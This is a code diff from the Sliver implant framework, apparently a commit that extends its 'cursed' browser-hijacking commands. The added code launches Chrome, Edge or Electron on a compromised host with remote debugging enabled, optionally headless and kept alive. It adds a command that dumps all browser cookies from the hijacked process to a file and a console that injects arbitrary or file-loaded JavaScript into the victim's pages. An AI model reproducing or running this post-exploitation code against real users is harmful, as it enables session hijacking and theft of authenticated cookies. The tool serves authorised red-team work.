BishopFox · moloch-- · Sep 26, 2022 · Sep 14, 2022 · Sep 25, 2022 · Sep 26, 2022
@@ -23,7 +23,7 @@ package command
 
 	Guidelines when adding a command:
 
-		* Try to reuse the same short/long flags for the same paramenter,
+		* Try to reuse the same short/long flags for the same parameter,
 		  e.g. "timeout" flags should always be -t and --timeout when possible.
 		  Try to avoid creating flags that conflict with others even if you're
 		  not using the flag, e.g. avoid using -t even if your command doesn't
@@ -3427,7 +3427,7 @@ func BindCommands(con *console.SliverConsoleClient) {
 		LongHelp:  help.GetHelpFor([]string{consts.Cursed, consts.CursedConsole}),
 		HelpGroup: consts.GenericHelpGroup,
 		Flags: func(f *grumble.Flags) {
-			f.Int("r", "remote-debugging-port", 21099, "remote debugging tcp port")
+			f.Int("r", "remote-debugging-port", 0, "remote debugging tcp port (0 = random)`")
 
 			f.Int("t", "timeout", defaultTimeout, "command timeout in seconds")
 		},
@@ -3444,14 +3444,19 @@ func BindCommands(con *console.SliverConsoleClient) {
 		LongHelp:  help.GetHelpFor([]string{consts.Cursed, consts.CursedChrome}),
 		HelpGroup: consts.GenericHelpGroup,
 		Flags: func(f *grumble.Flags) {
-			f.Int("r", "remote-debugging-port", 21099, "remote debugging tcp port")
+			f.Int("r", "remote-debugging-port", 0, "remote debugging tcp port (0 = random)")
 			f.Bool("R", "restore", true, "restore the user's session after process termination")
 			f.String("e", "exe", "", "chrome/chromium browser executable path (blank string = auto)")
 			f.String("u", "user-data", "", "user data directory (blank string = auto)")
 			f.String("p", "payload", "", "cursed chrome payload file path (.js)")
+			f.Bool("k", "keep-alive", false, "keeps browser alive after last browser window closes")
+			f.Bool("H", "headless", false, "start browser process in headless mode")
 
 			f.Int("t", "timeout", defaultTimeout, "command timeout in seconds")
 		},
+		Args: func(a *grumble.Args) {
+			a.StringList("args", "additional chrome cli arguments", grumble.Default([]string{}))
+		},
 		Run: func(ctx *grumble.Context) error {
 			con.Println()
 			cursed.CursedChromeCmd(ctx, con)
@@ -3465,14 +3470,19 @@ func BindCommands(con *console.SliverConsoleClient) {
 		LongHelp:  help.GetHelpFor([]string{consts.Cursed, consts.CursedEdge}),
 		HelpGroup: consts.GenericHelpGroup,
 		Flags: func(f *grumble.Flags) {
-			f.Int("r", "remote-debugging-port", 21099, "remote debugging tcp port")
+			f.Int("r", "remote-debugging-port", 0, "remote debugging tcp port (0 = random)")
 			f.Bool("R", "restore", true, "restore the user's session after process termination")
 			f.String("e", "exe", "", "edge browser executable path (blank string = auto)")
 			f.String("u", "user-data", "", "user data directory (blank string = auto)")
 			f.String("p", "payload", "", "cursed chrome payload file path (.js)")
+			f.Bool("k", "keep-alive", false, "keeps browser alive after last browser window closes")
+			f.Bool("H", "headless", false, "start browser process in headless mode")
 
 			f.Int("t", "timeout", defaultTimeout, "command timeout in seconds")
 		},
+		Args: func(a *grumble.Args) {
+			a.StringList("args", "additional edge cli arguments", grumble.Default([]string{}))
+		},
 		Run: func(ctx *grumble.Context) error {
 			con.Println()
 			cursed.CursedEdgeCmd(ctx, con)
@@ -3481,37 +3491,57 @@ func BindCommands(con *console.SliverConsoleClient) {
 		},
 	})
 	cursedCmd.AddCommand(&grumble.Command{
-		Name:      consts.ScreenshotStr,
-		Help:      "Take a screenshot of a cursed process debug target",
-		LongHelp:  help.GetHelpFor([]string{consts.Cursed, consts.ScreenshotStr}),
+		Name:      consts.CursedElectron,
+		Help:      "Curse a remote Electron application",
+		LongHelp:  help.GetHelpFor([]string{consts.Cursed, consts.CursedElectron}),
+		HelpGroup: consts.GenericHelpGroup,
+		Flags: func(f *grumble.Flags) {
+			f.String("e", "exe", "", "remote electron executable absolute path")
+			f.Int("r", "remote-debugging-port", 0, "remote debugging tcp port (0 = random)")
+
+			f.Int("t", "timeout", defaultTimeout, "command timeout in seconds")
+		},
+		Args: func(a *grumble.Args) {
+			a.StringList("args", "additional electron cli arguments", grumble.Default([]string{}))
+		},
+		Run: func(ctx *grumble.Context) error {
+			con.Println()
+			cursed.CursedElectronCmd(ctx, con)
+			con.Println()
+			return nil
+		},
+	})
+	cursedCmd.AddCommand(&grumble.Command{
+		Name:      consts.CursedCookies,
+		Help:      "Dump all cookies from cursed process",
+		LongHelp:  help.GetHelpFor([]string{consts.Cursed, consts.CursedCookies}),
 		HelpGroup: consts.GenericHelpGroup,
 		Flags: func(f *grumble.Flags) {
-			f.Int64("q", "quality", 100, "screenshot quality (1 - 100)")
 			f.String("s", "save", "", "save to file")
 
 			f.Int("t", "timeout", defaultTimeout, "command timeout in seconds")
 		},
 		Run: func(ctx *grumble.Context) error {
 			con.Println()
-			cursed.CursedScreenshotCmd(ctx, con)
+			cursed.CursedCookiesCmd(ctx, con)
 			con.Println()
 			return nil
 		},
 	})
 	cursedCmd.AddCommand(&grumble.Command{
-		Name:      consts.CursedElectron,
-		Help:      "Curse a remote Electron application",
-		LongHelp:  help.GetHelpFor([]string{consts.Cursed, consts.CursedElectron}),
+		Name:      consts.ScreenshotStr,
+		Help:      "Take a screenshot of a cursed process debug target",
+		LongHelp:  help.GetHelpFor([]string{consts.Cursed, consts.ScreenshotStr}),
 		HelpGroup: consts.GenericHelpGroup,
 		Flags: func(f *grumble.Flags) {
-			f.String("e", "exe", "", "remote electron executable absolute path")
-			f.Int("r", "remote-debugging-port", 21099, "remote debugging tcp port")
+			f.Int64("q", "quality", 100, "screenshot quality (1 - 100)")
+			f.String("s", "save", "", "save to file")
 
 			f.Int("t", "timeout", defaultTimeout, "command timeout in seconds")
 		},
 		Run: func(ctx *grumble.Context) error {
 			con.Println()
-			cursed.CursedElectronCmd(ctx, con)
+			cursed.CursedScreenshotCmd(ctx, con)
 			con.Println()
 			return nil
 		},

@@ -175,7 +175,7 @@ func startCursedChromeProcess(isEdge bool, session *clientpb.Session, ctx *grumb
 	con.Printf("success!\n")
 
 	con.PrintInfof("Starting %s process ... ", name)
-	debugPort := uint16(ctx.Flags.Int("remote-debugging-port"))
+	debugPort := getRemoteDebuggerPort(ctx)
 	args := []string{
 		fmt.Sprintf("--remote-debugging-port=%d", debugPort),
 	}
@@ -185,6 +185,16 @@ func startCursedChromeProcess(isEdge bool, session *clientpb.Session, ctx *grumb
 	if ctx.Flags.Bool("restore") {
 		args = append(args, "--restore-last-session")
 	}
+	if ctx.Flags.Bool("keep-alive") {
+		args = append(args, "--keep-alive-for-test")
+	}
+	if ctx.Flags.Bool("headless") {
+		args = append(args, "--headless")
+	}
+	additionalArgs := ctx.Args.StringList("args")
+	if len(additionalArgs) > 0 {
+		args = append(args, additionalArgs...)
+	}
 
 	// Execute the Chrome process with the extra flags
 	// TODO: PPID spoofing, etc.

@@ -52,7 +52,7 @@ func CursedConsoleCmd(ctx *grumble.Context, con *console.SliverConsoleClient) {
 		return
 	}
 	con.PrintInfof("Connecting to '%s', use 'exit' to return ... \n\n", target.Title)
-	startCursedConsole(curse, target, con)
+	startCursedConsole(curse, true, target, con)
 }
 
 func selectDebugTarget(targets []overlord.ChromeDebugTarget, con *console.SliverConsoleClient) *overlord.ChromeDebugTarget {
@@ -89,7 +89,13 @@ func selectDebugTarget(targets []overlord.ChromeDebugTarget, con *console.Sliver
 	return &selectedTarget
 }
 
-func startCursedConsole(curse *core.CursedProcess, target *overlord.ChromeDebugTarget, con *console.SliverConsoleClient) {
+var (
+	helperHooks = []string{
+		"console.log = (...a) => {return a;}", // console.log
+	}
+)
+
+func startCursedConsole(curse *core.CursedProcess, helpers bool, target *overlord.ChromeDebugTarget, con *console.SliverConsoleClient) {
 	tmpFile, _ := ioutil.TempFile("", "cursed")
 	reader, err := readline.NewEx(&readline.Config{
 		Prompt:      "\033[31mcursed »\033[0m ",
@@ -104,6 +110,19 @@ func startCursedConsole(curse *core.CursedProcess, target *overlord.ChromeDebugT
 		con.PrintErrorf("Failed to create read line: %s\n", err)
 		return
 	}
+
+	if helpers {
+		// Execute helper hooks
+		ctx, _, _ := overlord.GetChromeContext(target.WebSocketDebuggerURL, curse)
+		for _, hook := range helperHooks {
+			_, err := overlord.ExecuteJS(ctx, target.WebSocketDebuggerURL, target.ID, hook)
+			if err != nil {
+				con.PrintErrorf("%s\n", err)
+			}
+		}
+	}
+
+	con.Printf(console.Bold+">>> Cursed Console, use ':help' for options%s\n\n", console.Normal)
 	for {
 		line, err := reader.Readline()
 		if err == readline.ErrInterrupt {
@@ -116,8 +135,38 @@ func startCursedConsole(curse *core.CursedProcess, target *overlord.ChromeDebugT
 			break
 		}
 		switch strings.TrimSpace(line) {
+
+		case ":help":
+			con.Println()
+			con.Println("Available commands:")
+			con.Println("  :file - Execute local .js file")
+			con.Println("  :help - Show this help")
+			con.Println("  :exit - Exit the console")
+			con.Println()
+
+		case ":file":
+			jsCode, err := ioutil.ReadFile(line)
+			if err != nil {
+				con.PrintErrorf("%s\n", err)
+				continue
+			}
+			ctx, _, _ := overlord.GetChromeContext(target.WebSocketDebuggerURL, curse)
+			result, err := overlord.ExecuteJS(ctx, target.WebSocketDebuggerURL, target.ID, string(jsCode))
+			if err != nil {
+				con.PrintErrorf("%s\n", err)
+				continue
+			}
+			con.Println()
+			if 0 < len(result) {
+				con.Printf("%s\n", result)
+				con.Println()
+			}
+
+		case ":exit":
+			fallthrough
 		case "exit":
 			return
+
 		default:
 			ctx, _, _ := overlord.GetChromeContext(target.WebSocketDebuggerURL, curse)
 			result, err := overlord.ExecuteJS(ctx, target.WebSocketDebuggerURL, target.ID, line)
@@ -131,5 +180,4 @@ func startCursedConsole(curse *core.CursedProcess, target *overlord.ChromeDebugT
 			}
 		}
 	}
-
 }
@@ -0,0 +1,69 @@
+package cursed
+
+/*
+	Sliver Implant Framework
+	Copyright (C) 2022  Bishop Fox
+
+	This program is free software: you can redistribute it and/or modify
+	it under the terms of the GNU General Public License as published by
+	the Free Software Foundation, either version 3 of the License, or
+	(at your option) any later version.
+
+	This program is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	GNU General Public License for more details.
+
+	You should have received a copy of the GNU General Public License
+	along with this program.  If not, see <https://www.gnu.org/licenses/>.
+*/
+
+import (
+	"fmt"
+	"io/ioutil"
+	"strings"
+	"time"
+
+	"github.com/bishopfox/sliver/client/console"
+	"github.com/bishopfox/sliver/client/overlord"
+	"github.com/desertbit/grumble"
+)
+
+func CursedCookiesCmd(ctx *grumble.Context, con *console.SliverConsoleClient) {
+	curse := selectCursedProcess(con)
+	if curse == nil {
+		return
+	}
+	con.Println()
+
+	cookies, err := overlord.DumpCookies(curse, curse.DebugURL().String())
+	if err != nil {
+		con.PrintErrorf("Failed to dump cookies: %s\n", err)
+		return
+	}
+
+	con.PrintInfof("Successfully dumped %d cookies\n", len(cookies))
+	if len(cookies) == 0 {
+		return
+	}
+	saveFile := ctx.Flags.String("save")
+	if saveFile == "" {
+		saveFile = fmt.Sprintf("cookies-%s.json", time.Now().Format("20060102150405"))
+	}
+	jsonCookies := []string{}
+	for _, cookie := range cookies {
+		jsonCookie, err := cookie.MarshalJSON()
+		if err != nil {
+			con.PrintErrorf("Failed to marshal cookie: %s\n", err)
+			continue
+		}
+		jsonCookies = append(jsonCookies, string(jsonCookie))
+	}
+	err = ioutil.WriteFile(saveFile, []byte(strings.Join(jsonCookies, "\n")), 0600)
+	if err != nil {
+		con.PrintErrorf("Failed to save cookies: %s\n", err)
+		return
+	}
+	con.PrintInfof("Saved to %s", saveFile)
+	con.Println()
+}
@@ -149,10 +149,14 @@ func checkElectronProcess(electronExe string, session *clientpb.Session, ctx *gr
 
 func startCursedElectronProcess(electronExe string, session *clientpb.Session, ctx *grumble.Context, con *console.SliverConsoleClient) (*core.CursedProcess, error) {
 	con.PrintInfof("Starting '%s' ... ", path.Base(electronExe))
-	debugPort := uint16(ctx.Flags.Int("remote-debugging-port"))
+	debugPort := getRemoteDebuggerPort(ctx)
 	args := []string{
 		fmt.Sprintf("--remote-debugging-port=%d", debugPort),
 	}
+	additionalArgs := ctx.Args.StringList("args")
+	if len(additionalArgs) > 0 {
+		args = append(args, additionalArgs...)
+	}
 
 	// Execute the Chrome process with the extra flags
 	// TODO: PPID spoofing, etc.

@@ -21,6 +21,7 @@ package cursed
 import (
 	"bytes"
 	"fmt"
+	insecureRand "math/rand"
 	"strconv"
 	"strings"
 	"text/tabwriter"
@@ -35,6 +36,7 @@ import (
 
 // CursedChromeCmd - Execute a .NET assembly in-memory
 func CursedCmd(ctx *grumble.Context, con *console.SliverConsoleClient) {
+	// Collect existing curses from core
 	cursedProcesses := [][]string{}
 	core.CursedProcesses.Range(func(key, value interface{}) bool {
 		curse := value.(*core.CursedProcess)
@@ -48,6 +50,7 @@ func CursedCmd(ctx *grumble.Context, con *console.SliverConsoleClient) {
 		})
 		return true
 	})
+	// Display table if we have 1 or more curses
 	if 0 < len(cursedProcesses) {
 		tw := table.NewWriter()
 		tw.SetStyle(settings.GetTableStyle(con))
@@ -67,6 +70,7 @@ func CursedCmd(ctx *grumble.Context, con *console.SliverConsoleClient) {
 	}
 }
 
+// selectCursedProcess - Interactively select a cursed process from a list
 func selectCursedProcess(con *console.SliverConsoleClient) *core.CursedProcess {
 	cursedProcesses := []*core.CursedProcess{}
 	core.CursedProcesses.Range(func(key, value interface{}) bool {
@@ -107,3 +111,11 @@ func selectCursedProcess(con *console.SliverConsoleClient) *core.CursedProcess {
 	selectedPortNumber, _ := strconv.Atoi(strings.Split(selected, " ")[0])
 	return port2process[selectedPortNumber]
 }
+
+func getRemoteDebuggerPort(ctx *grumble.Context) int {
+	port := int(uint16(ctx.Flags.Int("remote-debugging-port")))
+	if port == 0 {
+		port = insecureRand.Intn(30000) + 10000
+	}
+	return port
+}
@@ -22,7 +22,6 @@ import (
 	"context"
 	"fmt"
 	"os"
-	"path"
 	"path/filepath"
 	"regexp"
 	"runtime"
@@ -173,7 +172,7 @@ func HandleDownloadResponse(download *sliverpb.Download, ctx *grumble.Context, c
 					fileName = fmt.Sprintf("down_%d.tar.gz", time.Now().Unix())
 				}
 			}
-			dst = path.Join(dst, fileName)
+			dst = filepath.Join(dst, fileName)
 		}
 
 		// Add an extension to a directory download if one is not provided.

@@ -249,6 +249,7 @@ const (
 	CursedConsole  = "console"
 	CursedElectron = "electron"
 	CursedEdge     = "edge"
+	CursedCookies  = "cookies"
 )
 
 // Groups